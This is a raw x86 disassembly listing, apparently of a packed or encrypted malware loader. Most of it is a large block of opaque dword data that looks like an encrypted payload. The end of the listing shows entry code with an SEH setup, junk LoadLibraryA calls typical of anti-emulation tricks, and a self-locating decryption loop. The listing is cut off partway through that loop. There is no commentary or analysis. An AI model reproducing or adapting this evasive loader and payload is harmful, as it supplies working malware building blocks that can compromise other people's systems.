dd 0BD2236FDh, 0CC300E3h, 242E4DA5h, 5891298h, 7CAA597Ch
dd 1B13CA35h, 5588CA61h, 0E42BC6EDh, 850FD565h, 2CE32FFAh
dd 304A7D4h, 23AF24A6h, 0C45AD44Ch, 0CE50C36Ch, 4638BD2Ah
dd 6DDC4EEDh, 9F009213h, 0B9008622h, 0DE42CC47h, 0E67ED47Dh
dd 16900F9Eh, 2CAB0F9Dh, 65C541C9h, 45FF32CBh, 0BC2AB12Fh
dd 98109539h, 6F079C15h, 3B49F7D9h, 37AD361Dh, 529E0399h
dd 7F47CECh, 3CAA3EB8h, 0C45F9844h, 0CF4AD411h, 970DDE3Eh
dd 0AC2AAC3Ch, 6DB54CC2h, 3CC14FD2h, 70C55E84h, 44DA42CCh
dd 0A821B633h, 0E369970Bh, 0F667901Ch, 80098B1Fh, 0F0CA0CF8h
dd 3CB32AA1h, 833ACF98h, 420BD204h, 28FA3D78h, 0D93C5AD1h
dd 30E70A59h, 6084EA48h, 73618C51h, 9C6762F4h, 0BC9BF725h
dd 0C201C717h, 5530685Ch, 0D16E5984h, 10C72B0Dh, 63B95422h
dd 55FAA0E8h, 0BC4129E4h, 9920105h, 3E4B926Bh, 0A4557034h
dd 0BD78E4DFh, 9B289CF4h, 0DD5ECFFBh, 0E83FE638h, 92798A6Bh
dd 0F48B7B9Ah, 98E8F239h, 7D8B1EB9h, 2CA7D2ABh, 16945ED5h
dd 0E10462AAh, 985FB2EDh, 4363A84Bh, 60636ED0h, 0EC5BED99h
dd 1790058Ch, 0DE9B57AEh, 0BBCFBE75h, 0C11B8209h, 4BAD23BEh
dd 109764F3h, 95482EE9h, 24EB064Dh, 0C84FDCB5h, 9C108D71h
dd 0E469F767h, 0E43BE34Fh, 6C7FD332h, 0F97A6AA1h, 60D73A29h
dd 0C94663D6h, 0A86FAE86h, 0B99D1F98h, 0F36FE35h, 946F36DCh
dd 3CD7B5ADh, 91930A81h, 0EFA650h, 0D9662BF9h, 884FA399h
dd 53D4EAD9h, 5580B8AAh, 0F43BFEBFh, 0BD1CF672h, 3CF33679h
dd 3642C3C5h, 0D40BD205h, 2EE1CA9h, 4EAB08D1h, 0CF273EB5h
dd 54AE8A1Ch, 0A2BF636Dh, 51DEE834h, 8077B2ECh, 292DD86Bh
dd 8D38068h, 3CB52EF1h, 0EFD54FC5h, 748EAE3Ch, 4DA09E4Dh
dd 0FC33DFE5h, 0D7B20BC3h, 2C4BD219h, 28AF36B1h, 4FCC49C6h
dd 5ED54DBEh, 54970E8Dh, 8CCB33D2h, 0F4808A41h, 0C077EE62h
dd 0FC7447F4h, 85D616DDh, 6C966E0Ch, 0A60CB6D5h, 78139D16h
dd 0CF1F860Dh, 0F27AE468h, 64799A00h, 0FB8B5ED5h, 0A85B02E8h
dd 0C3835F51h, 0B02659B1h, 91731109h, 0F5FF66EDh, 1CCB1774h
dd 0BD3A77A5h, 24EB07C9h, 37B942B5h, 98DE798Eh, 9007DE20h
dd 0B5F92626h, 0B45E46CDh, 7CF36B71h, 619666D1h, 0D13452D9h
dd 0A86F8369h, 8D935E90h, 7B37FE75h, 865BA89Dh, 0DCBB352h
dd 0DC160AC1h, 28FA1BBCh, 64EB6171h, 0BD1B03E2h, 4EC8BA71h
dd 0CC9F63D6h, 817BE229h, 0C41A8BA4h, 6CB36ABDh, 95B7DB3Ah
dd 448E9259h, 69D4F2F2h, 0C485AD1h, 0CFA7B5B9h, 0CC1E8DB9h
dd 3E7FA671h, 9C646FC4h, 805DAF25h, 0A641B353h, 7DA3C322h
dd 94607AB1h, 203116Ah, 0A7BB22A8h, 0C48B53C0h, 0EC19EA21h
dd 75E8DD57h, 0C40BE705h, 0ADA0F638h, 0C831A63h, 6C12C378h
dd 5C6A4289h, 47C56BC5h, 9C87E2FEh, 0EB29EE65h, 0C05F7B9Fh
dd 0F81AE9C9h, 0A1A37A85h, 10DA5D68h, 9CFAD3E9h, 67E07CA3h
dd 0AC17EEAAh, 2B5F2E84h, 0C58F36DDh, 0AC64FE9Dh, 2413D275h
dd 0B027BE30h, 0EC2DAC2Ch, 0ED0031EDh, 5C937E6Dh, 0C6BBEA26h
dd 0A98B34FEh, 885326C8h, 84639071h, 90079E34h, 21C4F17Bh
dd 589F73A5h, 68D7166Ch, 0D002F1D2h, 82CB12EDh, 0E8258E39h
dd 0DB539A7Bh, 98F20126h, 0D75B827Ch, 2902AB4Bh, 76934A9Ch
dd 40FB06E5h, 37BC72F9h, 0BD6703E2h, 0A01EBA71h, 0A547DE55h
dd 52CE6F24h, 959F46B8h, 7C848F2Ch, 0CA1965C5h, 0D75DC319h
dd 5D8BE302h, 0B4405A91h, 0A18840B5h, 0A116FC02h, 0F83FD3CBh
dd 72A1C7F1h, 6857BE50h, 5BD44930h, 0ABD824BCh, 6D94F7F8h
dd 0DF0CF47Eh, 8936EC82h, 0D81FF3EBh, 0BF44E92h, 1F4437EEh
dd 847E8ACCh, 6312B6BDh, 0D835A84h, 408F5481h, 0ABDB42BCh
dd 0F80AB2B8h, 39AE0A01h, 0C077AE52h, 61ACE30Dh, 8CF0A45h
dd 2CA33AB1h, 6762DB13h
dd 9DFB62A9h, 67E0785Bh, 0A9672FE6h, 2057CE05h, 0C6D69299h
dd 0E262F679h, 0EC26B205h, 0D346D252h, 0B369E760h, 0A98469Eh
dd 3DF333A0h, 6EC541C1h, 4D8B56DCh, 0A42AA529h, 8305DA17h
dd 0FF7EBE67h, 9431AF5Ch, 78FF66EDh, 1D9705B5h, 9E02EFCh
dd 36EB3AADh, 0DB4AC552h, 0D809972Ah, 92479B1Dh, 0BF34AD3Bh
dd 5DDA558Dh, 65B379EAh, 60DB1B8Ah, 448F1C98h, 0E463E37Bh
dd 8C45D511h, 0B729B139h, 0D41C8C00h, 7DEC6FFFh, 68B927D2h
dd 0D7F72BADh, 0A86FFC70h, 0D8702DDh, 23AF39F1h, 108B5AC0h
dd 7BEF6CE0h, 9D17924Dh, 0A932BC61h, 0EE5EDA49h, 0C849925Eh
dd 42C233A8h, 0C315A5h, 30EC71FAh, 14C94DCFh, 0F82AA934h
dd 911C9807h, 9A7EEA25h, 0A66BAB23h, 0FCB44D4h, 75E637E2h
dd 19915E90h, 59F535ACh, 1A9E0E27h, 374ADD4Dh, 0F725A65Fh
dd 427FDB39h, 3F5A28Dh, 406F66B4h, 0CF0B5E17h, 74FB6221h
dd 981F860Dh, 0BC33AA21h, 2057CE45h, 48B1299h, 0E86FF67Dh
dd 0CC43DA51h, 0B027BE35h, 941B8209h, 78FF66EDh, 5CD34AC1h
dd 0B72EA5h, 24AB32B9h, 0C84FD65Dh, 0EC63FA71h, 90079E15h
dd 0B43BA229h, 58DF46CDh, 7CF36AE1h, 60970E85h, 44CB52D9h
dd 0A82FB63Dh, 8C039A11h, 0F067FE75h, 10B56A49h, 9D3C4665h
dd 1CD3327Bh, 0BE52EDE5h, 64EB32C1h, 9C4C2112h, 0A33BE9BCh
dd 0D34195E2h, 0D03F69B9h, 14DD2DA9h, 7E8833D3h, 2BC33DCDh
dd 0C620865Bh, 927AFFF1h, 0C5C31AE9h, 709FC030h, 979EE989h
dd 219DCEAFh, 0DC570820h, 0A2782BADh, 0C0C3B279h, 20CF56DDh
dd 6CE37AD1h, 31FB9B18h, 0DE222E9h, 5B53B255h, 0B91EEA1h
dd 0D8F50BFAh, 3388D219h, 67223564h, 0EF835AB3h, 8C9781E5h
dd 0BC584246h, 31C94429h, 0DC32F69Ch, 0C04D6D65h, 0D640F70Dh
dd 859F649Eh, 77FBC6FFh, 50FDDD8Bh, 4604669Dh, 0EAE085E6h
dd 43644231h, 0EE7C31BAh, 3C759FB2h, 0EB37F63Dh, 4380EE1Ah
dd 0F01F58B0h, 769E4509h, 78FF26D5h, 0B4D34AC1h, 0B72E99h
dd 1C49B732h, 44A7D61Dh, 49C0586h, 90079E0Dh, 8CD91FAAh
dd 2DDF468Dh, 846EE3E9h, 8B974EA4h, 0A646AD45h, 6B2FF605h
dd 0B4E51F9Eh, 65EEFE35h, 0D41BFAABh, 38BF2545h, 0DF5A3981h
dd 4077FD6Eh, 8CB972F9h, 77F068F0h, 94DD2F32h, 644DE15h
dd 0F47798EAh, 19988282h, 46302AA1h, 24D84ED5h, 840B92E4h
dd 38E33476h, 0B33D9239h, 0CE223D4Ah, 179B42B1h, 0F0F5B6ABh
dd 0A85333C1h, 0AECE2E3Ch, 4F6BB14Dh, 4987DD2Ch, 0B33C9B70h
dd 0E906C14Ah, 34F76EEDh, 0F3062A38h, 68A69A9h, 0E0A0010Ah
dd 452DD259h, 1A9CC8C5h, 0C289F9Eh, 0F3B17EF5h, 51AE42F3h
dd 532FECA6h, 9F190103h, 0B29FBF94h, 0E7940D87h, 48B7E828h
dd 0EC2697B1h, 0D4C8A5ADh, 74FB626Dh, 0A0E133F2h, 5463AA61h
dd 0DFA83010h, 3C75979Ah, 6DE0F63Dh, 0CC03E2AFh, 0E303BA36h
dd 0A719428Ah, 70496936h, 95535822h, 24767D85h, 3882369Dh
dd 0EC43FF79h, 588BA2Ah, 47086594h, 8A4F7F92h, 1D77BD4Ch
dd 4A87B18Fh, 5BCEF504h, 6ABFAD78h, 8AF94DBCh, 0AA7736A4h
dd 19F405F4h, 0CA2F3111h, 0D1C2DD2Ch, 0AE7F9D9h, 7FB19564h
dd 6A9F93DCh, 0B73F6D9Ch, 0AA575B14h, 0E8A14BAAh, 1D20E229h
dd 0E760F9FCh, 2871A9FFh, 5F29A12Ch, 0EE0A51E6h, 44072EF9h
dd 0C43CA527h, 70831720h, 25236489h, 389DE475h, 3E51C9A5h
dd 865D0543h, 523A5A61h, 8A4CA922h, 632FDF9h, 146F4690h
dd 0B444DD5Fh, 0D32CC5B7h, 7971BAD1h, 0E057AA2Ch, 0AE6C39F3h
dd 0A8056ED5h, 14F6196Bh, 940F6F45h, 0EC24BD3Ch, 0B83FA62Ch
dd 91675885h, 0A890EB4h, 0E1800492h, 88F1625h, 93419131h
dd 0C47AD316h, 83FB22DAh, 0D82C0C88h, 0BC33AA21h, 9054BAC5h
dd 817CB8F9h, 0E82FC5F7h, 0CD43DA52h, 0B0D13A3Ah, 0C1A38209h
dd 0D3178A66h, 0B66EC36Ah, 0B0B76E9Dh, 0D3009851h, 887C5CD8h
dd 0EC63FA71h, 7EBA1714h, 0C03BE211h, 0D25AB186h, 7CF32AD2h
dd 0D8950E85h, 723436BEh, 0CF97B348h, 272D1175h, 0F0674613h
dd 0D72F692Fh, 0CF157B1Dh, 5CA08004h, 40F76EE5h, 966CAF1h
dd 9E7A9615h, 9FA93FC6h, 0D047DE15h, 77C3E669h, 6C9F0E48h
dd 0D13092A4h, 0EF7C4E3Dh, 0B78117EEh, 68EC76BDh, 48B75AD1h
dd 9B0DD705h, 2C718702h, 37F4E62Dh, 94DA026Ah, 0AB259D9h
dd 0A72BF20Ah, 3CCF56DDh, 884C2AEh, 0AD0E286Ah, 34FB1A5Bh
dd 0D85F7EE6h, 44D88E06h, 0E017A88Ch, 3AF63AF2h, 81FC942h
dd 0F37FD579h, 16DE9D0Ah, 32CEBD71h, 33943786h, 0DC200094h
dd 37A51965h, 0E46BF1BBh, 0E09B639Dh, 0D35CC426h, 0F92F4165h
dd 12049D15h, 0FE0A79B5h, 37983B8Ah, 0D2D2458Ah, 2F8B52A1h
dd 14277FB5h, 0FFC95FA6h, 0B023BE75h, 866F8209h, 863F4F55h
dd 546BE109h, 0ABB35A65h, 0CF534701h, 4DB87D3Ah, 0EC23C9FBh
dd 90079E1Dh, 9BBE85Ch, 589F7545h, 0C4B21EE1h, 0A9BE16ACh
dd 774FF7D3h, 4CEFB67Dh, 8A69012h, 5B67BE46h, 5EF173F9h
dd 788CAE28h, 5C23A081h, 7373EBEFh, 24172B9h, 7FF274A5h
dd 0EC1030B4h, 0D047CE55h, 447C9669h, 0A0F9ACC4h, 97D5D6D4h
dd 937DA675h, 398239D9h, 68AF4E2Bh, 7F49DF26h, 30873EF5h
dd 1DEE0289h, 7D75BEDDh, 0DC13F9C3h, 18FC88Fh, 2EAE45F9h
dd 8CF16EEh, 18E37AF1h, 38439E96h, 73987A3h, 7339C60Dh
dd 0C4A957E8h, 17BC8E45h, 847858DCh, 28AF36BDh, 0BC8A6FD1h
dd 0F2627CA5h, 0FEDB02FAh, 8BB523DAh, 9C938A41h, 0CB02EE65h
dd 61614AC9h, 8CF251Eh, 4A9ED11Bh, 0A7DF6F6Dh, 34C8E86Ch
dd 981E860Dh, 0C31DE21h, 0A3F2C46Ch, 0C48B52AAh, 4D65F599h
dd 0CC03E9D2h, 8411553h, 11EC7288h, 78BF5567h, 5CD348C1h
dd 0C8032CD0h, 172897B3h, 6329D61Dh, 0D49547F8h, 4BF9E55h
dd 1F3BA20Ah, 6B55C33Ah, 7CFB6AA1h, 0CE30E85h, 7741D72Eh
dd 0AC2FB67Dh, 87769A11h, 756D46C5h, 0D41BF1CDh, 0CFF2CD07h
dd 5CA08004h, 40FF6EE5h, 2FA07F9h, 82EF15A5h, 0EC103E94h
dd 0E3ECB855h, 0E19048A9h, 0B6BEEBh, 0F378FABh, 44174E85h
dd 0AE981Ah, 0EEF36CEh, 0C646AD7Ah, 30A77E86h, 729B0299h
dd 8CBF67D5h, 0D4974A42h, 0B3B30B2Fh, 0F4DB279h, 0C04AE0D2h
dd 0C7E33AC2h, 230D9B62h, 34BB22E9h, 0D12B864Dh, 7971BAD1h
dd 0E057BD87h, 4ECE25F3h, 28AF768Eh, 0BC831AB1h, 74E50B73h
dd 0AA94CFCDh, 8BBD03A7h, 119A8A41h, 0C037D6BBh, 18EB591Fh
dd 0B8886398h, 0D3ECBAB1h, 0D530F495h, 74BB5163h, 981FC60Dh
dd 8D551247h, 9E3CC30h, 1C3BB9FFh, 0DBEB7377h, 2C83DA11h
dd 38971436h, 0A79107FEh, 0F8FF66ADh, 5EA64AC1h, 0A53DA815h
dd 24EB013Bh, 34CF7D3Bh, 5C648F74h, 6F481E15h, 31CC0869h
dd 589F7547h, 7CF26AE1h, 202705F0h, 7749D7D3h, 4385B67Dh
dd 0FBBFC1Eh, 72C2F4B5h, 0B25B827Ah, 92BE9606h, 2F198F76h
dd 40F76EA5h, 4B9E72FBh, 0BB8513EAh, 0AC23BA71h, 0CA32DE51h
dd 717122D9h, 18DF3509h, 0F3A8F2Bh, 40164E85h, 0E2B3F409h
dd 685FDD7Ch, 0C73523Ah, 323BBBFh, 0E33102C9h, 0B84C6CE8h
dd 0D453CA41h, 0E627DB25h, 0AEC33181h, 8FCD578h, 0DC481CF1h
dd 0A08FF594h, 0B73E28E1h, 725F867Eh, 0CFF96F96h, 0E0178E45h
dd 0B1FAD249h, 90C913C8h, 0A989E212h, 70A74D76h, 94E8E9AFh
dd 66828F87h, 6B13CA39h, 804464E0h, 0C46BF279h, 0B990639Dh
dd 4AB8D1C6h, 5ADF576Dh
dd 34C8E14Ch, 9BFB460Dh, 8FB00F2Bh, 8B31CE05h, 3C55AFB0h
dd 29E5F63Dh, 0F49D7FDBh, 1B41BE75h, 1119DAB9h, 78BF556Fh
dd 0D656BD6Bh, 3B76E96h, 2BAA32B9h, 0C84F51D9h, 88044271h
dd 1D8CB89Eh, 0B47B91A3h, 58DFB74Ch, 0BD0468E1h, 63970E85h
dd 237357ACh, 3013159h, 8C039AA9h, 85CC9875h, 5FE3A44Fh
dd 80144048h, 1A1C6DE5h, 26375D4Eh, 0EE6E8552h, 880FD62Eh
dd 0D922BA31h, 5AC22915h, 0F47BA25Ah, 6C97068Dh, 0B10B4C87h
dd 2A52B9A9h, 840BD22Ah, 67ED76FDh, 0ADC99B44h, 0F92395D3h
dd 0ACFD0AFCh, 5319E249h, 0D4E3D9AAh, 0E639458Fh, 0A676EA81h
dd 8FCD258h, 87481CF1h, 0BA4EAE96h, 731A75Eh, 0D85FC60Dh
dd 0DC076A61h, 653D89B5h, 0C40BE1DBh, 25B5D67Ch, 0CA71218h
dd 4365DBF7h, 0B01B4289h, 0BCFB262Eh, 36723AAAh, 20885603h
dd 0D7E95773h, 0A3E916DDh, 1F29BF46h, 50E75E95h, 278F62E9h
dd 0AB9503FAh, 0BC33AA61h, 2D23EE45h, 488D56Eh, 0ED1BF67Dh
dd 27E94AE1h, 3BE035C6h, 0D4235484h, 0F13E4DEDh, 463B680h
dd 3335ABAFh, 0D30132F9h, 887C5CD8h, 0AC63FA71h, 0F60BEA15h
dd 0BEF8F291h, 18ECC448h, 1AF981E1h, 6A77F13Dh, 4F8D07Ch
dd 5F84D03Dh, 0CC301094h, 0F067FD75h, 2328B648h, 788CAC28h
dd 1C930A81h, 0B7FA1AC5h, 64EB713Eh, 380AE21Dh, 5FC810A1h
dd 55CC11DEh, 0F43BDA87h, 5016CEA6h, 0CB7A195Dh, 0E0E4C440h
dd 40B9219h, 0E5E103FDh, 0CF0D854h, 70AFB4B5h, 6798FB09h
dd 357B6B95h, 0DC43EE05h, 303F4EE4h, 0A2C819B2h, 88FEEEBBh
dd 0D485D197h, 0A8EF9E1Ah, 36BB22A9h, 80F4A0ACh, 89BA6FCAh
dd 0D1AFE803h, 74E0B499h, 0AD229C7Eh, 0CC32905h, 436DFB02h
dd 54DB4289h, 0BE4AB62Dh, 0C4EBA156h, 93FCF78Eh, 0CF93D951h
dd 0FE029D4Dh, 2DA37A89h, 10FF8840h, 0FFC263E9h, 111BA249h
dd 0FC23C59Ch, 0FAEA4545h, 2F8B52A1h, 0A85720F8h, 46C62D51h
dd 0F027FE06h, 0E01B8209h, 0D32791EFh, 0AD34E03h, 20AADF2h
dd 24AB7280h, 0C9965252h, 0E18BFA71h, 0DB079E15h, 0F175F06Ch
dd 76ED7581h, 7CBF26A5h, 54779B7Ah, 0C1425299h, 0A86F8F2Fh
dd 0B05B1142h, 83982676h, 0E0184961h, 0C749DA45h, 0E606817Eh
dd 1BF72EDDh, 0EDE730FAh, 0C8368098h, 0A461B931h, 0E95D5BDCh
dd 87F0E229h, 982CF9A5h, 0D4B32AA1h, 5F28B810h, 0BCF12F92h
dd 80B976BDh, 0B33CAC18h, 85DAB3Eh, 5E1002C9h, 0F435E565h
dd 35D0046Ah, 0E0BFA120h, 0AB2BB238h, 48CE0C59h, 925679F1h
dd 13875EADh, 7483E81Ch, 30636A4Dh, 0FCD16F6Eh, 0A69A8E05h
dd 0ECEF95Dh, 2BAF7685h, 8A6B4A97h, 0F3188103h, 14E3B874h
dd 0B34AA62Dh, 931FCD3Ah, 0C076F5E6h, 0DD671979h, 48B7EC08h
dd 212635B1h, 53C75ED4h, 34C3A86Ch, 0A09EE00Dh, 393C8FDEh
dd 2057CEB9h, 2F895212h, 3FC23Eh, 33BC2C18h, 88DD030Ch
dd 11148249h, 78FF6609h, 642DCFC2h, 85B42EE5h, 24EB0A73h
dd 8F64D6D6h, 21E1F57Dh, 0AB079E15h, 3734AA6Eh, 58DF4609h
dd 7FF1AA62h, 0E5941AC2h, 448B6A13h, 1DD0E66Fh, 8C43A303h
dd 0C4C76B8Ah, 5101C209h, 8F3A296Dh, 0F5930A81h, 40F76E79h
dd 0E1E48DC5h, 880F9689h, 0A33684B1h, 0D04755D0h, 0F53D6969h
dd 48AB45A6h, 0C346F249h, 5A6A773Ah, 0F10BD221h, 966A758Ah
dd 4FC31AE9h, 709FF430h, 0A1E8B89h, 737FA654h, 0CAD6F141h
dd 0F237EE1Ch, 0BEAE8931h, 3ACF16E4h, 6CE34798h, 27F56E95h
dd 34BB3D41h, 24114B4Dh, 0FE582BEAh, 0DB07CC06h, 8472CCDCh
dd 0ABA343BDh, 3D7C0A55h, 6CC33A7Ah, 97C0A9A8h, 80D923A2h
dd 17738A41h, 804F24D0h, 121D1A79h, 0A1EEE962h, 0ACA33AB1h
dd 17EC50A0h, 4FF210E5h, 1A108E4Ah, 43CC551Dh, 92D2C10Ch
dd 8F74ED67h, 4FEED241h, 0CC43F9DBh, 0CFD841CAh, 0DE9ABEE2h
dd 78FF06C9h, 9CE00421h, 8793222Eh, 6492303Ch, 46F65B5Dh
dd 0EF63FA52h, 0D03F5490h, 119EC429h, 5B196D83h, 3ED87EA3h
dd 9BD1C889h, 104A9531h, 0AD2FB63Dh, 5039A11h, 0AE380233h
dd 72EE4F8Ah, 6EBF669Ah, 28479F7Eh, 0B8746EA5h, 0DF6F7D06h
dd 10F961Dh, 0EC1B10B4h, 8647B455h, 0C1777796h, 0D81A06CDh
dd 3C17AEAEh, 60FC4EC5h, 8761C249h, 0EE1CADh, 8CC35AD1h
dd 8432C1E3h, 979B42BDh, 7C701995h, 0DC53CF7Eh, 0B8992BACh
dd 29A6B279h, 488F6E6Fh, 5459EF7Ch, 42D61ED5h, 0CBEB22C3h
dd 986B1AD8h, 38B6961h, 0E51A0A0Ah, 0C421D259h, 10018342h
dd 997C1AD1h, 70A74A2Dh, 5B24BA4Ah, 0B83B50A9h, 5E960301h
dd 0F377AE5Dh, 0B5A8F1B0h, 0CE547CDh, 8216C5E0h, 0AFC71EEDh
dd 34CFDA7Ch, 97DF030Dh, 0BC3778A5h, 0A99EFD45h, 44B3D41Ch
dd 0B93EA77Dh, 0C343C539h, 25D8EE35h, 945BB6F1h, 0FCF0A668h
dd 5CD34E4Ah, 387DAB2Ch, 9C6832F9h, 0C84FBF7Ch, 1B5BB1FAh
dd 0D0341490h, 0B43BA229h, 5BD933DDh, 3CE30564h, 63453D85h
dd 0B33AA518h, 7AAA3FDCh, 3403DA29h, 0F067DDE6h, 0D76789C2h
dd 78AF4928h, 1F413981h, 0B7069924h, 0AA6EFB18h, 4B0FD625h
dd 0AA680D3Eh, 5D723DACh, 4374FA3Ah, 0C89C12CEh, 147241E8h
dd 9A569EC6h, 0EA62E546h, 0EBF20204h, 3EC256ABh, 0CECB555h
dd 178F4002h, 0BCF2F62Fh, 5A43509h, 50C6F06h, 0A46B8AFBh
dd 6C9BDD1Eh, 0E32349E1h, 1087A617h, 0FB30E1A9h, 65D2CDA6h
dd 0FC33DDC7h, 0D3C805F9h, 0A5777E90h, 529330CFh, 2CAF18E6h
dd 4BB425Fh, 20F57E25h, 0CD3F9AF0h, 17DA69E9h, 9832D364h
dd 0EF1FF23Ch, 5ACC45A0h, 1F2635B1h, 0DB38A12Ah, 3DAC5FEAh
dd 1C10C543h, 43CC5507h, 75149978h, 1F0F1DD7h, 0D5900982h
dd 0FE709906h, 4F373A3Ah, 0C4267DF6h, 77B032BEh, 0A32C4F45h
dd 0E86C1D5Ah, 0DB54CC94h, 36B75252h, 3E50058Eh, 900788FDh
dd 4B544A29h, 5837B932h, 21F36AE1h, 4E75E304h, 7A225299h
dd 0CC2FB63Eh, 3988A8EEh, 0F027C6BFh, 0B2794B2Dh, 62F2182Ch
dd 1FB48F8Eh, 1E7C6EE5h, 23571C5h, 0CD5FAD9Ch, 0AF343F3Eh
dd 93B0DE55h, 0F45BE27Fh, 121A098Dh, 0CAB32AA2h, 0AFD51286h
dd 8408929Dh, 6094F7FDh, 6CE37AF1h, 3254BABAh, 0C5730289h
dd 0F7801993h, 0DC5122C3h, 907D2525h, 1C27F83Ah, 48CE56DDh
dd 87EA92A0h, 85B7E16Ah, 34FB1121h, 6D6FE6FCh, 0FC33D9E8h
dd 29E9AE6Fh, 2C5FAA01h, 0D750DC52h, 988CC814h, 4105AD37h
dd 14E8C85Ch, 0D0DA4D2Dh, 9C138A07h, 0C071863Ch, 0C33F279h
dd 0F770FC52h, 1F21BF3Bh, 0D4415E95h, 34C8E0C3h, 1A9A0E0Dh
dd 5E33EA12h, 0AAD239A5h, 0C8B52AAh, 9D6FF67Dh, 48FE5A58h
dd 0B127FE06h, 11EC477Dh, 78BF5567h, 5DD34AC2h, 0BD3735D1h
dd 24EB013Bh, 48FFA258h, 0AC5079CCh, 37739B15h, 87BF1FA9h
dd 2CDA468Dh, 0F6769D7Fh, 60974EB6h, 304B52D9h, 2A923634h
dd 8E03DA22h, 55E47702h, 0D41BFB4Bh, 0CC2CCEADh, 0D87BF57Eh
dd 0A8089118h, 64EB70D3h, 0B0C10B96h, 4ECBBA71h, 0DFB821A9h
dd 0F479F2EDh, 0D22A8D8Dh, 0B7B36A99h, 7ED4729Bh, 7BF671F1h
dd 926D7902h, 0CDC35AD0h, 30C71AFFh, 0EA10E289h, 827CB03Fh
dd 0CC29C955h, 0B3BD2BD2h, 0A42BB279h, 46BA46DDh, 5F77CF7Ch
dd 9D0C1ED5h, 34FB32C6h, 610862BEh, 0FC73E284h, 0F0173B88h
dd 61B8D219h, 2A4C360Ch, 8B45BE62h, 8F18A0FCh, 0DE5EB5FAh
dd 0B83FE61Eh, 93038A01h, 0C07746E1h, 0CC180D79h, 0F77E7A75h
dd 0D636B14Eh, 0D5C71EEDh
dd 0E67F6D3Bh, 131F860Dh, 0FC0B6094h, 301D4545h, 64AF5818h
dd 0C38FF67Dh, 0CE30D21Bh, 0C2247706h, 0FB96B91Dh, 0F3FF26FDh
dd 1CC3254Ch, 8BE15CA5h, 81281685h, 0C80FC632h, 83C47971h
dd 90079E15h, 0B533D8A2h, 0AFDC4E87h, 0F9789D66h, 60D7365Fh
dd 7741D72Eh, 0A86FB67Dh, 8E779A11h, 8264E682h, 5D6BEB45h
dd 78862418h, 34E08181h, 0C5005EE4h, 64AB4173h, 880F965Dh
dd 0B4D4B845h, 2CF63604h, 1F221D96h, 30EC0581h, 6DBF588Ah
dd 0FF73BD93h, 10BE1F40h, 9BEF36CEh, 439D0575h, 0B72AAC84h
dd 149B0342h, 0CBF77357h, 0DA26CA01h, 0D64F7C4Ch, 0F4A3A00Dh
dd 0A8A5BE22h, 0E7B9850Eh, 5A8412DFh, 0BE3ED5B9h, 0D85F867Eh
dd 7163EA61h, 0F3628844h, 0FD495FD0h, 0ADAC36FDh, 0CC30AFEh
dd 7088D976h, 7FDB42C9h, 3FB68E6Eh, 9C138A55h, 0E07FADA2h
dd 134BD259h, 48BC9C18h, 2CA33AB1h, 2C02A55h, 8B024401h
dd 1594DCF2h, 0BC739323h, 6BDECDA6h, 14C199B1h, 0D0A173F6h
dd 867ADA11h, 3924CD3Dh, 0D61A8A43h, 209CE5FDh, 8E56C1C1h
dd 68B76E9Dh, 24AB112Dh, 9147945Ch, 6633B970h, 0D0341680h
dd 3EBE5529h, 58DF06FEh, 8E36AE1h, 0F1A0D83h, 0F2CB12C9h
dd 22AA413Dh, 8C03DA22h, 8567FC75h, 239D3C5Dh, 788CAC28h
dd 18930A81h, 0CAF11BE5h, 24D8FB4Ch, 28A611Dh, 0AC23FA02h
dd 0A547DE15h, 0F67C6862h, 0CE9DAC4Fh, 3558DD43h, 62E5494Fh
dd 66DD90B3h, 0C3D450Ah, 0C3A7785Ah, 8D2466B7h, 14DB3A27h
dd 7FFBE96Dh, 23AC35BAh, 0C00F6490h, 0B8BE4D39h, 0B7CF16E8h
dd 2CDBBC44h, 8412E195h, 0B9BB629Dh, 986774C0h, 46E66761h
dd 0B117CE3Dh, 3B4BB80Bh, 68979808h, 1C16E591h, 8FE73EC0h
dd 14E3EC7Ch, 2CAA592Dh, 1113CA35h, 804048D0h, 4EDE0D79h
dd 5E8F56A5h, 19AFAF4Eh, 0F5445E95h, 74BB5A47h, 98F7450Dh
dd 0E133AA21h, 0CDD6CF2Fh, 4CB203Bh, 29600625h, 8C568ED4h
dd 73E73B35h, 64E44A8Ah, 2C7AA7E2h, 9FD30AD4h, 2AB73E98h
dd 42B747B9h, 0C46BAADCh, 0FF168B1Dh, 6FC37675h, 0B14E5DD6h
dd 0A7243B25h, 8321821Eh, 4EF6F17Ah, 12B37F26h, 8D97A409h
dd 0EC039A11h, 0F985B9Dh, 5F62B7B6h, 0B58F02E9h, 5CA4AC34h
dd 48A7E5E5h, 62D1F39Fh, 0DE2AE51Fh, 5323BA59h, 0BA835555h
dd 0B2BB069h, 58AA5618h, 3477A9A1h, 9F8B7044h, 877ECE26h
dd 80EBB07Eh, 0B33CA1FBh, 0CF58415Dh, 0AC586376h, 0F87FE619h
dd 0F3EB7BAAh, 6837AE25h, 0A42BB229h, 0F0CF761Fh, 6CE37AC1h
dd 10871D7Dh, 349FE0A9h, 0D47B92C0h, 4F0C4ACh, 800EF205h
dd 0C44BD2B1h, 0CFBBDBDh, 160847A1h, 438B9374h, 0EF334289h
dd 0D9C059C8h, 9D138EC3h, 0C772EC63h, 0B2E9A87Ah, 176E0204h
dd 7C9B7AFCh, 0DDh, 72h dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_30909891
call sub_3090993B
jmp loc_309098E9
start endp
; =============== S U B R O U T I N E =======================================
sub_30909891 proc near ; CODE XREF: start+3�p
; FUNCTION CHUNK AT 3090995C SIZE 00000011 BYTES
push dword ptr fs:0
mov fs:0, esp
xor edx, edx
push 2000h
push edx
push edx
push 80000000h
push 80000000h
push 80000000h
push 80000000h
push 80000000h
push edx
push edx
push edx
push edx
call ds:dword_3090708C ; LoadLibraryA
xor ecx, ecx
push 80000000h
push ecx
push ecx
push 8000h
push ecx
push 800h
push 20h
push ecx
call ds:dword_3090708C ; LoadLibraryA
loc_309098E9: ; CODE XREF: start+D�j
sub eax, eax
loc_309098EB: ; CODE XREF: sub_30909891+60�j
dec al
or al, al
jz short loc_309098F5
jnz short loc_309098EB
jmp short loc_3090995C
; ---------------------------------------------------------------------------
loc_309098F5: ; CODE XREF: sub_30909891+5E�j
sub ebx, ebx
sub ecx, ecx
mov cl, 1Ah
loc_309098FB: ; CODE XREF: sub_30909891+6B�j
inc ebx
loop loc_309098FB
call $+5
pop ecx
sub ecx, 0FFFFFFBBh
xor edx, edx
or edx, 243Ch
push ecx
loc_30909913: ; CODE XREF: sub_30909891+92�j
mov al, [ecx]
sub ax, bx
